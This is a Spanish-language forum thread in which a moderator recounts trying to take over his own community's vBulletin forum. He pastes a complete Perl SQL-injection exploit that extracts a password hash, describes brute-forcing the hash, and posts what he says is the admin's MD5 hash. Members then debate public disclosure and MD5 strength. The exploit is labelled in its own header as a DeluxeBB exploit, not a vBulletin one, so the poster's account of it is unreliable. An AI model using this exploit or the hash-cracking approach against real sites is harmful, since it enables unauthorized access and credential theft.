Os he hackeado el foro...














Que nooooo. Pero casi y eso es muy triste viniendo de alguien que no tiene ni puñetera idea.


Ayer por la tarde cuando hice la lista de la venganza tenía mucho más fundamento de lo que mis apreciados votantes y los demás se imaginaban. Porque ya había comenzado un ataque al foro. Por suerte para ellos no he tenido éxito y me he aburrido pero si llego a conseguirlo los habría metido a todos en un subforo cárcel a mi merced después de haber quitado los rangos de administración a los tres administradores que técnicamente no aprobarían ni de coña. Luego Grani habría accedido en un momentito a la base de datos y manualmente habría restablecido los permisos adecuados así que mi momento de gloria habría sido ínfimo. Pero bueno, para disfrutar y alargarlo más un poco de ingeniería social habría dado bastante resultado seguramente.

Gañanes :yaha:

Os cuento:

Existe, creo que desde Enero o este mismo mes un Exploit para las versiones 3.6.4 y 3.6.5 de vBulletin que ¡oh, es la que tenemos en este foro! Yo la encontré ayer poniendo en Google "exploit vbulletin 3.6.5", ya veis qué difícil fue.

Es un programita en Pearl que inyecta código SQL a través de algún formulario del foro, supongo, quizá el de registro o más probablemente el de login para obtener el hash MD5 de la contraseña de administración. VBulletin cuando te registras calcula el hash y lo guarda en la base de datos y cada vez que haces login lo recalcula y lo compara con ese valor guardado para dar o no el acceso. De esta manera ni los administradores podrían entrar suplantando a otro usuario, al menos esa es la teoría.

Para quien guste leerlo, el código, pequeñísimo, del exploit es el siguiente:

#!/usr/bin/perl

use IO::Socket;


print q{
#############################################
# DeluxeBB 1.06 Remote SQL Injection Exploit#
# exploit discovered and coded #
# by KingOfSka #
# http://contropotere.netsons.org #
#############################################
};

if (!$ARGV[2]) {

print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid

perl dbbxpl.pl www.somesite.com /forum/ 1


};

}


$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs%20WHERE%20(uid='".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

if ($answer =~/(\w{32})/)
{

if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

}
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";

# milw0rm.com [2006-05-15]

El 70% son lineas de código en plan "imprime" o comentarios, es algo totalmente trivial con un conocimiento mínimo de estas cosas.

Esto no tarda nada, es decir, lo ejecutas y obtienes el valor al instante. Lo siguiente es donde he fallado yo pero por pura suerte vuestra o porque fuisteis responsables en su día de manera semiconsciente :P

Una función hash es una función no invertible que de un texto binario de longitud cualquiera saca una salida de longitud fija distinta a cualquier otro texto dentro de su rango teórico de valores totales, creo que MD5 eran 128 bits. A día de hoy esto no es seguro, no sé por qué se siguen empeñando en implementar cosas utilizando esta función hash. Por este motivo, no puedo darle la vuelta, lo único que se puede hacer es hacer una ataque por fuerza bruta.

En mi caso, ha sido un programita cutre de 150 Kbs que ha estado ejecutando en mi portátil desde ayer a esta hora. He llegado a casi terminar de probar todas las posibles secuencias de longitud 1, 2, 3, 4, 5, 6 y 7, y pensaréis ¿por qué no has seguido? Pues porque el crecimiento es exponencial y para probar las de longitud 8 tendría que haber tenido mi portátil con el procesador al 99% durante varios meses. Y no me apetece.

Pero yo soy un triste que es la primera vez que intenta hacer algo así, un hacker con conocimiento y herramientas no se iba a salvar tampoco del ataque por fuerza bruta, que con una contraseña bien puesta le iba a costar mucho (o muchíííísimo) sacarlo también peeero podría, se me ocurre, utilizar varios ordenadores a su disposición con troyanos que le den parte del procesador y otros programas que hagan uso de tablas Rainbow que hacen que el posible crackeo del hash sea mucho más rápido. También existen enormes bases de datos con el par texto-md5 en varios idiomas. Por suerte la de este foro no está en ellos porque estarán palabras típicas, fechas y no a lo mejor contraseñas como "jaarrrlvivachiquitolatronaronerarl". Y esto que digo no es nada raro, se hace a diario y no hace falta ser un crack para hacer cosas así.

La cuestión importante es que, aunque ya ha pasado mucho tiempo y los que nos tocaban la moral antiguamente hackeando el foro cada X meses no parecen seguir rondando, el foro tiene un agujero de seguridad crítico.

Soluciones:

- actualizar a la última versión de vbulletin. Ésto sería lo más normal.
- cambiar las contraseñas de los administradores cada pocos días. Esto sería lo a corto plazo vago y a largo mucho más costoso y coñazo.

De la que os habéis librado, si llego a conseguir privilegios la montaba parda. Ya había pensado en qué avatares poner a cada uno, firmas, creación de subforos cárcel, un nuevo banner y más cositas pero nunca ocurrirá. Me lo habría pasado genial.

A cascarla.

Ah, por cierto, el hash es éste: ee99ceffaa5cfadb5b07ddae35383182 ¡corred a cambiar la contraseña! Go Go Go!


Me merezco piedras verdes.

:chewy:

Y esto no lo podrias poner en el foro de moderacion?

se tiene que enterar to dios?


No puse la ultima versión porque no vi que tuviera parche para castellano y os hubierais quejado como haceis siempre. Ahora viene el listo este y me toca las huevas... pffff

Lo he pensado pero lo he puesto aquí para obligarte a solucionarlo. Tranquilo. Con una contraseña de más de 9 dígitos incluyendo mayúsculas, minúsculas, números y signos de puntuación, de esta forma no te va a hackear nadie el foro a no ser que sea la NSA si la cambias con frecuencia. Por eso te daba esa solución temporal por si te da miedito hasta que actualices el foro.

Don't Worry, my friend.




P.S: Dame piedras verdes ¡desagradecido!

Y luego a lo mejor la versión 3.6.8 tiene un agujero aún más tocho, quién sabe, pero en teoría no debería ocurrir, para eso está actualizar el software y para eso estás además pagando una licencia de vbulletin que no es un foro phpbb gratuito que si te lo cascan no te puedes quejar.

Te voy a dar una patada en los cojones! Por suerte mi contraseña tiene 13 dígitos.


Lo de actualizar la version, no se si podré hacerlo a piñon o tendré que trabajar un mínimo.

Habría tardado varias decenas de años en sacarla.

¿Y lo divertido que habría sido? :( Os ibais a cagar, yo dueño y señor del foro. Me iba a hacer un usuario con el avatar de El Pacto de los Lobos para ejecutar mi venganza uno a uno sobre los paletos que se dedican a ejecutar aldeanos y encima producen daños colaterales bushianos.

Algún voluntario para moderador de Música?

Gandalf : He encontrado una pistola cargada en la calle, os podría matar a todos si quisiera. Mira, en serio, está cargada, compruébalo tú mismo.

...

Dadle piedras. De las de verdad.

Yo es que aun no entiendo el "porque" de este hilo.

No es eso, Daion, es "puede haber un francotirador apuntándote cada vez que salgas a la calle". Yo sólo soy Garganta Profunda*

Vaya forma de darme las gracias, hijosdebutah. A la próxima no diré nada y luego lloraréis.


*Sin chistecitos.

Yo es que aun no entiendo el "porque" de este hilo.

Que actualices el foro para que no haya peligro de que nos lo hackeen cuando hagamos las próxima kdd.

y eso no me lo puedes decir en privado? es decir, tienes que crear tu circo para recibir aplausos y demas? xDDD

Te molas demasiado a ti mismo, algún dia llegarás con el pene a tu propio ano y entonces serás un ser completo.

Y corre peligro de que pete con la actualización, o de que falle algo y se vaya a tomar por culo también.

Claro, piensa que soy yo quien lo actualiza, me he cargado varios foros ya.


Es como si yo fuera un negro, y al otro lado de la calle hubieran un grupo de skin heads que no me han visto. En vez de acercarte y decirme: "oye tio, cuidao que esos te apalean si te ven." Tu me has gritado desde lejos: " NEGROOOOOOOOOO, QUE TE VAN A PEGAAAAAAAAAR, JAJAJAJA, DAME LAS GRACIAS QUE TE HE AVISAO MAJETEE!!"

Es que si te lo digo en privado igual no lo haces, por pura vagancia y así sí lo vas a hacer. Te lo he explicado antes.


Y corre peligro de que pete con la actualización, o de que falle algo y se vaya a tomar por culo también.

Pues nada, no vuelvas a usar una vión y a partir de ahora ve a todas partes en carreta de caballos. Vaya mentalidad, colega.

Lo que os digo, no queréis entender lo que he hecho.

La próxima vez me callo, lo dicho.

Es que si te lo digo en privado igual no lo haces, por pura vagancia y así sí lo vas a hacer. Te lo he explicado antes.

Seguramente no lo haga igualmente. xD

Oye, yo creo que si mueves esto al MR no se entera nadie. Total sólo hemos posteado moderadores.


AQUI NO HA PASADO NADA

CIRCULEN

Gandalf, no te enfades, que te queremos. Aceptamos barco!

Gandalf, eres el Krad de los moderadores.


No sé si es un cumplido, pero se me acaba de ocurrir ahora mismo.

Lo que os digo, no queréis entender lo que he hecho.

La próxima vez me callo, lo dicho.
Lo lógico es decírselo a los admin y listo, que son ellos los que tienen que arreglarlo. Lo de actualizar a la última versión no siempre es lo más correcto, por los bugs que pueden traer y por incompatibilidades. ¿Cuando en la informática ha sido lo más lógico instalarse la última versión de algo en cuanto sale?

Yo lo decía porque tu comentario era actualiza que te pueden petar el foro con el exploit y yo te he dicho que el foro se puede petar con la actualización también. No es tan descabellado cuando además no sería la primera vez que ocurre.

Aplausos por encontrar un exploit para un foro en google no te voy a dar, vamos que tiene misterio 0, es como aplaudir a Corleone por rayar coches.

Mil duros por Keltar, nuevo moderador de música.

Esto es como el stratego pero con subforos.

Voy gananddo yo.

Espero que ahora Gandalf no esté maquillado de gotico y sentado en la oscuridad mientras se lamenta de que su vida no tenga sentido.

¿Pero a que voy ganando yo?

Daion, tu avatar no me gusta, parece un huevo de oro.

Hagas lo que hagas grani, haz una copia de la base de datos, por lo que pueda pasar.

Y teniendo foro oculto, gandalf.. es absurdo lo que has hecho. Bonita charla sobre MD5 y demás historias, eso sí.

Es el que toca esta semana. La semana que viene, los jinetes del apocalipsis.

Keltar, no lo quieres entender o me malinterpretas. Yo no busco aplausos, esos ya me los di yo ayer en privado y suenan mucho mejor para mis oídos que los de cualquier otro. Lo que busco es ayudar y si me lo puedo pasar bien pues mejor.

Y repito, si lo hago en privado sé que no se va a hacer porque sé lo vagos que somos unos y otros y con el "mientras no lo sepa nadie" lo único que se consigue es precisamente que se pueda hacer. Tienes un ejemplo muy claro de esta filosofía: Microsoft. Como os vea quejaros de Microsoft un día me chivaré a Bill Gates.

No sé cuál será la última versión de vbulletin ni cuándo habrá salido pero si hay 3.6.8 quiere decir que hay 3.6.6 y 3.6.7 que no tienen este problema y no son las últimas. Y si este exploit lleva circulando dos meses, habrá dado tiempo de sobra a que saquen una versión nueva, la prueben y la validen de sobra.

Que a Grani le petara el foro en su día por hacer un traspaso de la Base de Datos de un tipo de foro a otro no tiene nada que ve con una actualización que será prácticamente automática, el cambio es de 3.6.x a 3.6.y no es nada brusco, con casi total seguridad habrán corredigo el agujero y punto y eso no te va a dar incompatibilidad ninguna. Y si él no sabe que le pida ayuda a Fonk y entre los dos seguro que no tienen ningún problema. Que ser administrador no sólo es poner emoticonos, también es hacer este tipo de cosas que es lo más normal del mundo.

Este post es estúpido de cojones-




Una función hash es una función no invertible que de un texto binario de longitud cualquiera saca una salida de longitud fija distinta a cualquier otro texto dentro de su rango teórico de valores totales, creo que MD5 eran 128 bits. A día de hoy esto no es seguro, no sé por qué se siguen empeñando en implementar cosas utilizando esta función hash. Por este motivo, no puedo darle la vuelta, lo único que se puede hacer es hacer una ataque por fuerza bruta.

El MD5 mencionado está razonablemente catalogado como no seguro, pero coño hasta cierto punto, como el hash que se encripta solo es de un sentido y no se puede desencriptar (eh incluso varias contraseñas diferentes pueden dar lugar al mismo hash) el único medio conocido de saltarselo de toda la vida de Dios es mediante fuerza bruta, como casi todo lo que te quieras saltar que pida una clave.


En mi caso, ha sido un programita cutre de 150 Kbs que ha estado ejecutando en mi portátil desde ayer a esta hora. He llegado a casi terminar de probar todas las posibles secuencias de longitud 1, 2, 3, 4, 5, 6 y 7, y pensaréis ¿por qué no has seguido? Pues porque el crecimiento es exponencial y para probar las de longitud 8 tendría que haber tenido mi portátil con el procesador al 99% durante varios meses. Y no me apetece.

Ehm, pues vas de culo porque mi clave es de 5 dígitos.


Ah, por cierto, el hash es éste: ee99ceffaa5cfadb5b07ddae35383182 ¡corred a cambiar la contraseña! Go Go Go!


Me merezco piedras verdes.

Sí, y un aplauso.

El único objetivo de este post que vislumbro es que antes nadie se iba a molestar en hackear el foro (porque siendo sinceros a nadie le importa una mierda a estas alturas molestarse en hacerlo) y ahora igual puedes animar a alguien a que lo haga.

Mola la verdad.

Yo paso de cambiar la contraseña.

}:-D

Cabron, no me enseñes a ser admin tu ahora.

Porque a krad no lo cuentas?


edito...

puto krad, sabe mas que yo.

Keltar, no lo quieres entender o me malinterpretas. Yo no busco aplausos, esos ya me los di yo ayer en privado y suenan mucho mejor para mis oídos que los de cualquier otro. Lo que busco es ayudar y si me lo puedo pasar bien pues mejor.

Y repito, si lo hago en privado sé que no se va a hacer porque sé lo vagos que somos unos y otros y con el "mientras no lo sepa nadie" lo único que se consigue es precisamente que se pueda hacer. Tienes un ejemplo muy claro de esta filosofía: Microsoft. Como os vea quejaros de Microsoft un día me chivaré a Bill Gates.

No sé cuál será la última versión de vbulletin ni cuándo habrá salido pero si hay 3.6.8 quiere decir que hay 3.6.6 y 3.6.7 que no tienen este problema y no son las últimas. Y si este exploit lleva circulando dos meses, habrá dado tiempo de sobra a que saquen una versión nueva, la prueben y la validen de sobra.

Que a Grani le petara el foro en su día por hacer un traspaso de la Base de Datos de un tipo de foro a otro no tiene nada que ve con una actualización que será prácticamente automática, el cambio es de 3.6.x a 3.6.y no es nada brusco, con casi total seguridad habrán corredigo el agujero y punto y eso no te va a dar incompatibilidad ninguna. Y si él no sabe que le pida ayuda a Fonk y entre los dos seguro que no tienen ningún problema. Que ser administrador no sólo es poner emoticonos, también es hacer este tipo de cosas que es lo más normal del mundo.
En el subforo de moderación habría quedado la mar de cuco en todo caso, no tengo más que decir.

Por cierto avisa a los de La Caixa que igual alguien lleva 2 años intentando petar su clave de admin por fuerza bruta.

Y cuando decía "razonablemente catalogado como no seguro" no decía que sea facílisimo de descoyuntar sino que los dos medios más a mano que tiene alguien que tontee con joderlo son:
-Lo de ir probando claves por fuerza bruta
-Meterse en una página de encriptación/desencriptación de hashes de MD5, que las hay a porrón mirando por el google y que en realidad no desencriptan sino que comparan con la base de datos que van guardando de la gente que las utiliza para encriptar y si encuentra una (o más) coincidencias te las pone para ver si suena la flauta.
Pero esto son unas posibilidades ínfimas.
Por ejemplo el hash que has pegado no me lo desencripta en ninguna de las páginas de MD5 más visitadas.

Vamos lo que quiero decir es que en el fondo es útil porque esto sigue siendo un foro y no la caja del Banco de Spaña y saltarse el mismo probando claves requiere mucha suerte y mucho tiempo libre.

Cosa que no creo que nadie tenga para dedicarlo a ello.

Bueno menos Gandalf.

Mira si al final teniamos razón al quemarlo en Castronegro.

}:-D

A KraD no lo cuento porque personalmente no creo que en este tema pueda ayudar y creo que Fonk sí. No todos los administradores tienen que saber de todo, la cuestión es que el equipo sí controle de todo.


El MD5 mencionado está razonablemente catalogado como no seguro, pero coño hasta cierto punto, como el hash que se encripta solo es de un sentido y no se puede desencriptar (eh incluso varias contraseñas diferentes pueden dar lugar al mismo hash) el único medio conocido de saltarselo de toda la vida de Dios es mediante fuerza bruta, como casi todo lo que te quieras saltar que pida una clave.

Te remito a las tablas Rainbow que he comentado en el primer post, la base de datos de MD5 que comentaba o a servicios gratuitos muy fáciles de encontrar por internet para que ellos mismos busquen con sus medios la hash que tú le metas. La criptología existe porque hay métodos, muchas más veces de las que nos gustaría, más eficientes para romper algo que la fuerza bruta. MD5 es inseguro, es un hecho, otra cosa es que seas capaz de controlar esa inseguridad de otra forma. Por eso os daba la solución de la actualización periódica de contraseñas.


Ehm, pues vas de culo porque mi clave es de 5 dígitos.

No es tu clave la busca ese programa. Busca la del usuario Administrador. No sé cómo funciona vbulletin pero para que te hagas una idea sería como el Administrador de Windows que existe al margen de los usuarios que te crees tú con esos permisos y que realmente a veces no los tienen y precisamente hay que entrar por con esa cuenta.

En todo caso, si no existe ese usuario, la cuenta que buscaría no sería la de un admin "artificial" al que se le han dado privilegios sino la del usuario administrador original, que supongo que sería Grani o el usuario que creara para empezar a montar el foro.

Decir que tú tienes una contraseña de 5 dígitos es aproximadamente unas 100.000.000 de veces más peligroso que todo lo que yo he escrito aquí porque con un programita cutre ahora sí que puede venir cualquiera y quitarte la cuenta en un plisplás y la liamos.


Sí, y un aplauso.

El único objetivo de este post que vislumbro es que antes nadie se iba a molestar en hackear el foro (porque siendo sinceros a nadie le importa una mierda a estas alturas molestarse en hacerlo) y ahora igual puedes animar a alguien a que lo haga.

Mola la verdad.

Yo paso de cambiar la contraseña.

Hamigo mío. No.

Yo no sé si a alguien le importa hackear este foro o no, la cuestión es que aunque quiera y lo intente, no pueda. Ese dato que doy es inútil haciendo dos simples clicks por parte de un administrador porque al instante no significará absolutamente nada.


Por cierto avisa a los de La Caixa que igual alguien lleva 2 años intentando petar su clave de admin por fuerza bruta.

Esto sí que no me lo esperaba. Creo que dar razones sólidas de que vuestra mentalidad de "seguridad" no es la adecuada y que se debería cambiar por el bien de todos, que "más vale un por si acaso que un yo pensé" no merece que se me lance una indirecta en plan "sí, te crees Dios, no nos des clases" porque no es ese el tema ni la intención.

Me parece que hasta ahora no os he dicho ninguna tontería y que los que mantenéis una actitud errónea sois vosotros y os estoy explicando el porqué. No creo que sea tan costoso dar el brazo a torcer cuando hay que hacerlo y más cuando se trata de algo que implica a todo el foro, luego que cada cual a nivel particular haga lo que le de la gana mientras no repercuta en otros.

Por ejemplo el hash que has pegado no me lo desencripta en ninguna de las páginas de MD5 más visitadas.

Evidente, si no, yo estaría ahora pasándomelo pipa haciendo putaditas a los enceguecidos votantes que me inmolaron :D

Claro, los demás no damos el brazo a torcer pero tu sigues en tus trece con que este hilo aquí está de perlas, al próximo ponle neones y hazlo post-it.

Mclaud, ¿te animas a remover conmigo los cimientos de esta anquilosada sociedad?

Yo he dado razones, creo que bastante sencillas y válidas para justificar que este hilo esté aquí. Resumo:

- Que esté oculto no va a hacer bien alguno. Si alguien pretende hackearlo no hace falta que se lo explique yo, con cuatro palabras en google y quince minutos navegando consigues exáctamente lo mismo.

- Que esté oculto puede hacer mal. Precisamente porque como se supone que no se sabe no se arregla lo que se tiene que arreglar. El principal problema de la seguridad es el exceso de confianza, pensar que estás seguro cuando no lo estás. Creo que mejor aviso que el que he dado no hay*.


Ahora dime tú qué se gana y qué se pierde haciéndolo público, que igual me convences, yo ahora mismo creo en todo lo que he dicho aquí.



* Esta lección la he aprendido de jugar mucho al rol con Latro.

perdeis el tiempo. pudiendo ver porno...

ademas, nada tendra sentido cuando llegue el dia del jucio final y las maquinas tomen el control.

Te remito a las tablas Rainbow que he comentado en el primer post, la base de datos de MD5 que comentaba o a servicios gratuitos muy fáciles de encontrar por internet para que ellos mismos busquen con sus medios la hash que tú le metas. La criptología existe porque hay métodos, muchas más veces de las que nos gustaría, más eficientes para romper algo que la fuerza bruta. MD5 es inseguro, es un hecho, otra cosa es que seas capaz de controlar esa inseguridad de otra forma. Por eso os daba la solución de la actualización periódica de contraseñas.

Tiempo ha ojeé las tablas arcoiris de marras, en teoría hacían el proceso más fácil pero se las puede joder tranquilamente si uno se molesta por eso digo que toda la pollada de que no es lo suficientemente seguro no me la creo hasta que no haya una demostración práctica de ella.
Mira hay así como 3000 foros de hackers en la red, deberías de otear cada cuanto tiempo sale alguien preguntando como desencriptar un hash en MD5 y como se rien de él y le prometen un premio si lo consigue.

Y no tengo ni idea de como encripta el vbulletin ni que función usa o si mete las salts de los huevos que hacían la cosa más lenta.

Pero que encuentres algo válido entre los "servicios gratuitos de internet" para desencriptar un password completo implica que dicho paswword sera algo así como "fcbarcelona" o algo no excesivamente complejo.


No es tu clave la busca ese programa. Busca la del usuario Administrador. No sé cómo funciona vbulletin pero para que te hagas una idea sería como el Administrador de Windows que existe al margen de los usuarios que te crees tú con esos permisos y que realmente a veces no los tienen y precisamente hay que entrar por con esa cuenta.

Cierto te leí mal y en diagonal, volví a releerte y ví lo de que obtenías un hash con el exploit que era el de administración.

Pensaba que estabas tratando de hacer otra cosa una vez que no podías hacer nada con el hash. Vamos que estabas tratando de probar un usuario y todas las combinaciones posibles de dígitos por fuerza bruta o algo similar.

Que viene a ser lo mismo que la única opción que tienes para darle la vuelta al MD5.

Lo de seguridad/inseguridad es muy relativo, solo en internet trata de localizar un foro yanki (por ejemplo que son más) donde alguien haya dado el reverse al MD5 y la contraseña original no fuese "love" o polladas similares.


Decir que tú tienes una contraseña de 5 dígitos es aproximadamente unas 100.000.000 de veces más peligroso que todo lo que yo he escrito aquí porque con un programita cutre ahora sí que puede venir cualquiera y quitarte la cuenta en un plisplás y la liamos.

Sí, puede venir alguien y quitarme la cuenta del foro.

Que vayan probando contraseñas de 5 dígitos.

Es más podeis empezar cuando querais.

Esto es seguridad, ¡ingeniería social inversa!


Me parece que hasta ahora no os he dicho ninguna tontería y que los que mantenéis una actitud errónea sois vosotros y os estoy explicando el porqué. No creo que sea tan costoso dar el brazo a torcer cuando hay que hacerlo y más cuando se trata de algo que implica a todo el foro, luego que cada cual a nivel particular haga lo que le de la gana mientras no repercuta en otros.

No, es que en vez de decir:

"Hola cucos, mientras estaba aquí en la sala de estudios esperando para el exámen oral de macroeconomía informática tomandome un frapuccino me he dado cuenta de que ha salido un agujero de seguridad en el vbulletin y que se tapa con esto"

...decir...

"DESDE AYER POR LA TARDE TENGO EL PC ENCENDIDO AL CIENPORCIEN A TODA MECHA A TODA MECHA NO TE HAGAS LA ESTRECHA PA VER SI OS PUEDO JUANKEAR EL FORO PORQUE ME HE ENCONTRADO UN XPLOIT EN LOS LINKS DE LA DERECHA DE YONKIS PUNTO COM QUE ME DA EL SIGUIENTE HASH XXXXUPAP0LL45NVINNAGR3 QUE ES DE
UNO
DE
VOSOTROS
Y CON EL CUAL TENIA PREVISTO AJUSTICIAROS A TODOS
PERO ME CANSE AL RATO PORQUE EL PC ECHABA HUMO
ASI QUE CAMBIAD TAL QUE YA LA VERSION QUE LA VAMOS A TENER
que vamos que al final no me ha salido, pero os lo tenía que contar"

Pues es un poco como circense.

Vamos me parece a mí.

}:-D

Lo importante no es ganar, es participar.

Tú lo deberías saber mejor que nadie.

KraD, necesito tu cuenta un momentillo. Es que cuando utilizaste mi usuario en la Nevera me dejé algunas cosillas que me gustaría recuperar, ¿te importa? Un cono de tráfico creo que era.

Pásame el password por messenger si eso.

la de nova era? estas de broma no? o lo he entendido mal

http://www.forotroncs.com/novaera/

Joder, claro que era circense y si hubiera podido habría montado el Circo, no lo dudes. Y ya ves tú si habría habido entertainment de ese que tanto os gusta conmigo de administrador terminator durante unas horas. ¿O es que sólo se puede ser circense para marcarse un hilo de cine o para contar la historia del rock and roll? Creo que tenéis la mente demasiado adaptada a las costumbres y esquemas habituales de vuestro entorno, Thomas Reid lloraría de emoción si pudiera leerte en estos momentos.

Para la próxima falsificaré un carné photoshopeado de licencia de payaso de circo en los foros de internet y cuando alguien me pida los papeles para tener licencia de circo no habrá problema.

KraD, que digas que si la contraseña del administrador no es una palabra chorra MD5 es seguro no es la verdad. Una función hash no es segura dependiendo de la contraseña que se utilice, precisamente porque no se puede uno fiar en la estupidez o desconocimiento del usuario que la vaya a utilizar. Es segura por un lista de propiedades matemáticas que requerirían aquí una larga explicación y que no son opinables.

MD5, repito, no es seguro y no es que lo diga yo, es que lo dice la comunidad internacional especialista en estos temas. Se le conocen vulnerabilidades desde hace 11 años. Que en la práctica sea viable es un hecho, si no, no lo usaría este foro ni sistemas operativos supuestamente seguros como los basados en UNIX pero porque es uno de los muchos niveles de seguridad del sistema. Hace tres días encontraron una vulnerabilidad en el kernel de superlinux-superseguro, que con 4 lineas tristes te hacía root ¡oh, muerte a windows! y se actualizó el kernel cerrando el agujero y fin, se lo instalaron los frikis y no les cascó el PC. ¡Y sí, se publicó por todo internet! ¿Por qué será?

Y no es necesario que sea una contraseña chorra. Mi programa ha probado todas las contraseñas de longitud 6 que puedes meter con los caracteres que tú le digas que pruebe, no sólo las chorras, en apenas dos horas. Repito, por eso di el aviso de qué contraseñas se deben utilizar. Si buscas, verás que la gente que ha tenido éxito con este exploit es precisamente por la contraseña de mierda que tenía el admin que la rompieron sin despeinarse con la chorrada de programa que he usado yo.

Pero es que el problema no es ese, el problema es que en esta versión del vbulletin se pueden hacer inyecciones de código SQL malicioso e igual que existe este exploit pueden desarrollarse unos cuantos más para putear de otras formas, lo que pasa es que la contraseña de admin es lo más suculento y bonito pero pueden hacerse otro tipo de putadas. Así que independientemente de la gravedad de este exploit, que como verás por todas partes, es crítica, el hecho es que existe un agujero que podría ser explotado de otras formas.

Yo creo que el que no se da cuenta del tema eres tú gandolfo.

A ver, está claro que los admins pueden ser muy vagos, o No, pero es que tampoco tienen que estar aquí pendientes de esto todo el día, que por dios, cambiamos de foro cada cierto tiempo y nunca ha pasado nada, hemos perdido troncs y la nevera y ahí había muchos años de posteo, y qué, aquí seguimos, en otra etapa.

El hecho de que tú hallas, con buena intención, abierto este hilo has digamos avisado de que esta vulnerabilidad existe, y que por ejemplo yo, no la conocía, y ahora me podría poner a hacer el tonto, o no.

No me parece lógico que porque los admins vayan a pasar si se lo dices en privado sea razón para ponerlo aquí en público, es que tenemos algo que opinar los demás? Acaso porque los usuarios lo digamos van a tener que actualizar el foro y ya está?.

Ah y en cuanto a lo de linux, si estás físicamente presente en la máquina, con una livecd y el comando chroot puedes cambiar la contraseña y acceder a cualquier directorio de cualquier usuario, lindezas de linux, pero bueno.

Yo creo que es hora de poner a Gandalf en el banner del foro.

Dejadle, ¿no veis que está resentido por la tontería esa de que le han matado?

Para Dade:

Joe, yo no he dicho que estén pendientes todo el día pero hay momentos en que sí y creo que éste es uno pero claro, esa es mi opinión personal. No te digo que estén mirando cada día a ver qué pueden hacerle al foro como si estuvieran cuidando su Ferrari. Pero es que no se me ocurren muchos motivos de importancia mayor para tener que ponerse a tocarle al foro las entrañas. Porque hasta hoy, todo lo que hemos dicho en plan "señor admin, haga esto" son lujos y comodidades.

Y lo de hacer el tonto intentando cascar ésto da igual. Siempque que se haga caso a la segunda solución que puse hasta que se actualice. Por eso lo puse, si no, sí lo habría hecho en privado porque realmente sería dejar la puerta abierta a cualquiera. Pero no es así a no ser que tengas el Mare Nostrum para crackear este foro esta noche, cosa que dudo o que la contraseña del foro sea "pepe*".

Si lo he escrito aquí, es, repito para presionar un poco tanto yo haciéndolo público como la opinión del resto de usuarios diciendo "eh, chicos, hacedlo, queremos sentirnos tan seguros como si Mitch Bucanan vigilara nuestras playas" porque si no, no se hace, los administradores son tan seguidores de Homer Simpson como yo y si no les das un empujoncito (como a Bilbo) no se mueven. No pensaba que os fuera a escandalizar el asunto tanto. La próxima vez lo diré en rima y le pondré música para suavizarlo.




*Como en mi linux cuyo usuario he olvidado. Saber la contraseña y no el usuario ya es lo último XD

Bannnnnnnneeeeeeeeeeeeeeeeeeeeeeeeer


Bannnnnnnnnnnneeeeeeeeeeeeeeeeeeeeeeeeeeeeer

MCLAUD LO ESTAS DESEANDO


HAS SONREIDO

LO HE VISTO

Yo si lo conseguía había pensado poner un banner a lo Independence Day, claro que lo tendriá que haber encargado porque yo de photoshop...

...si es que lo tenía todo pensado, habría sido tan divertido ... :(

Redios parece un redactor de barrapunto.



MD5, repito, no es seguro y no es que lo diga yo, es que lo dice la comunidad internacional especialista en estos temas. Se le conocen vulnerabilidades desde hace 11 años. Que en la práctica sea viable es un hecho, si no, no lo usaría este foro ni sistemas operativos supuestamente seguros como los basados en UNIX pero porque es uno de los muchos niveles de seguridad del sistema. Hace tres días encontraron una vulnerabilidad en el kernel de superlinux-superseguro, que con 4 lineas tristes te hacía root ¡oh, muerte a windows! y se actualizó el kernel cerrando el agujero y fin, se lo instalaron los frikis y no les cascó el PC. ¡Y sí, se publicó por todo internet! ¿Por qué será?

Hace 11 años o por ahí se recomendó saltar a SHA-1 porque era mucho más seguro, pero que yo sepa aún no se había descoyuntado del todo.
Hace unos años salió en pruebas el MD5CRACK que lo que hacía era tirar de la paradoja del cumpleaños (que era el rollo ese de en un de x grupo de personas habrá x posibilidades de que dos tengan el mismo cumpleaños) para intentar crear una colisión en MD5, y se consiguió y tal tras muchas pruebas.

Pero esto es importante si estamos hablando de niveles de seguridad elevados.

Si por algo se utiliza en los foros como medida de seguridad para los passwords es que los mismos foros no requieren unas medidas de seguridad más elevadas. De ser así tanto phpbb como vbulletin estan otorgando en la base de datos a cada administrador una galería de hashes para divertirse.

En este caso depende más de la contraseña que utilice cada uno que de otra cosa, por lo que calificarlo de inseguro me parece exagerado cuando funciona perfectamente para este propósito.

}:-D

Lo peor es que me lo imagino pasando la noche frotandose las manos y maquinando su maquiavélico plan en un storyboard en una pizarra grande.

Y riendo de vez en cuando sin motivo desde la ventana de su casa a la ciudad.

Y con una erección, por supuesto.

}:-D

Aceptamos barco.

Por cierto que La Paradoja del Cumpleaños es algo curiosísimo...bueno, según se mire. Al que le gusten las anécdotas matemáticas que rompen el sentido común que lo mire. Y resulta que luego tiene gran utilidad.

Lo peor es que me lo imagino pasando la noche frotandose las manos y maquinando su maquiavélico plan en un storyboard en una pizarra grande.

Y riendo de vez en cuando sin motivo desde la ventana de su casa a la ciudad.

Y con una erección, por supuesto.

}:-D

Si no hubiera tenido un examen hoy seguro que sí, es divertidísimo ver como el programa te pone:

- Probadas 41234123415346435656 contraseñas
- Te quedan 451451435123412341234 horas para molarte un poco más si tienes suerte.

